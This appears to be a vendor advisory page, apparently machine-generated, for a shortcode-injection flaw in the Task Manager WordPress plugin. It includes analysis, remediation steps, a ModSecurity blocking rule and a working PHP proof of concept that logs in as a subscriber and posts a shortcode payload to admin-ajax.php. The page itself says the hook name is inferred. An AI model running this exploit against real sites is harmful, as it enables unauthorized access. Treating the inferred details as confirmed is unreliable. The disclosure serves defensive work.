Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : March 28, 2026

CVE-2026-4004: Task Manager <= 3.0.2 – Authenticated (Subscriber+) Arbitrary Shortcode Execution via 'task_id' Parameter (task-manager)

CVE ID CVE-2026-4004
Plugin task-manager
Severity Medium (CVSS 6.5)
CWE 94
Vulnerable Version 3.0.2
Patched Version
Disclosed March 19, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-4004 (metadata-based): This vulnerability in the Task Manager plugin allows authenticated users with Subscriber-level permissions or higher to execute arbitrary WordPress shortcodes. The flaw exists in the plugin’s AJAX handler for the ‘search’ action, where insufficient validation and missing capability checks enable code injection.

The root cause is improper control of code generation (CWE-94). The vulnerability description indicates the `callback_search()` function lacks a capability check, allowing low-privileged users to call it. User-supplied input in parameters like `task_id` passes through `sanitize_text_field()`, which does not strip shortcode syntax. This input is then concatenated into a `do_shortcode()` call. Atomic Edge research infers these code patterns from the CWE classification and the explicit mention of `sanitize_text_field()` and `do_shortcode()` in the description. The absence of a source code diff prevents confirmation of the exact code flow.

Exploitation occurs via a POST request to the standard WordPress AJAX endpoint `/wp-admin/admin-ajax.php`. The attacker must be authenticated. The `action` parameter must be set to the plugin’s specific AJAX hook for the search function, which Atomic Edge research infers is likely `task_manager_search` based on the plugin slug. The attacker injects shortcode syntax into one of the vulnerable parameters, such as `task_id`. A payload like `[shortcode attribute=”value”]` would be executed by `do_shortcode()` when the plugin processes the search query.

Effective remediation requires two changes. First, implement a proper capability check within the `callback_search()` function, such as `current_user_can(‘edit_posts’)` or a custom capability, to restrict access to intended users. Second, validate and sanitize the relevant parameters before they reach `do_shortcode()`. This could involve stripping square brackets, using `sanitize_text_field()` in conjunction with `wp_strip_all_tags()`, or using an allowlist of expected values for IDs.

The impact is arbitrary shortcode execution. Shortcodes can have powerful effects depending on other installed plugins or themes. This could lead to information disclosure, privilege escalation, or even remote code execution if a plugin with a dangerous shortcode is present. The CVSS vector scores this with low confidentiality and integrity impact, but the actual severity depends entirely on the available shortcodes on the target site.

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity 
# Atomic Edge WAF Rule - CVE-2026-4004 (metadata-based)
# This rule blocks exploitation of the Task Manager plugin's vulnerable AJAX search handler.
# It matches the exact AJAX endpoint and the specific action parameter, then detects
# the presence of shortcode opening brackets in the vulnerable 'task_id' parameter.
SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" 
  "id:400400,phase:2,deny,status:403,chain,msg:'CVE-2026-4004 via Task Manager AJAX - Arbitrary Shortcode Execution',severity:'CRITICAL',tag:'CVE-2026-4004',tag:'WordPress',tag:'Plugin-TaskManager'"
  SecRule ARGS_POST:action "@streq task_manager_search" "chain"
    SecRule ARGS_POST:task_id "@rx \[" 
      "t:none,t:urlDecodeUni,t:lowercase"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC 
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-4004 - Task Manager <= 3.0.2 - Authenticated (Subscriber+) Arbitrary Shortcode Execution via 'task_id' Parameter
<?php
/**
 * Proof of Concept for CVE-2026-4004.
 * Assumptions based on metadata:
 * 1. The vulnerable AJAX hook is derived from the plugin slug 'task-manager'.
 * 2. The vulnerable parameter is 'task_id' as per the description.
 * 3. The target user has Subscriber-level credentials.
 */
$target_url = 'https://target-site.com'; // CHANGE THIS
$username = 'subscriber_user'; // CHANGE THIS
$password = 'subscriber_pass'; // CHANGE THIS

// Payload: Execute the [caption] shortcode as a common example.
// An attacker would replace this with a shortcode available on the target.
$shortcode_payload = '[caption]Shortcode execution test[/caption]';

// Step 1: Authenticate to obtain cookies.
$login_url = $target_url . '/wp-login.php';
$ch = curl_init();
curl_setopt_array($ch, [
    CURLOPT_URL => $login_url,
    CURLOPT_RETURNTRANSFER => true,
    CURLOPT_FOLLOWLOCATION => true,
    CURLOPT_COOKIEJAR => 'cookies.txt',
    CURLOPT_POST => true,
    CURLOPT_POSTFIELDS => http_build_query([
        'log' => $username,
        'pwd' => $password,
        'wp-submit' => 'Log In',
        'redirect_to' => $target_url . '/wp-admin/',
        'testcookie' => '1'
    ]),
    CURLOPT_HEADER => true
]);
$response = curl_exec($ch);
curl_close($ch);

// Step 2: Craft the exploit request to the AJAX endpoint.
$ajax_url = $target_url . '/wp-admin/admin-ajax.php';
$ch = curl_init();
curl_setopt_array($ch, [
    CURLOPT_URL => $ajax_url,
    CURLOPT_RETURNTRANSFER => true,
    CURLOPT_FOLLOWLOCATION => true,
    CURLOPT_COOKIEFILE => 'cookies.txt',
    CURLOPT_POST => true,
    CURLOPT_POSTFIELDS => http_build_query([
        // Inferred action name: plugin prefix + '_search'
        'action' => 'task_manager_search',
        // Inject shortcode into a vulnerable parameter.
        'task_id' => $shortcode_payload
        // Other vulnerable parameters per description: 'point_id', 'categories_id', 'term'
    ]),
]);
$ajax_response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

// Step 3: Output result.
echo "HTTP Code: " . $http_code . "n";
echo "Response (first 500 chars): " . substr($ajax_response, 0, 500) . "n";
// Success is indicated by a 200 response and the shortcode output in the response body.
// The exact output depends on the shortcode's function.
?>

Frequently Asked Questions

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations

Trusted by Developers
Blac&kMcDonaldCovenant House TorontoAlzheimer Society CanadaUniversity of TorontoHarvard Medical School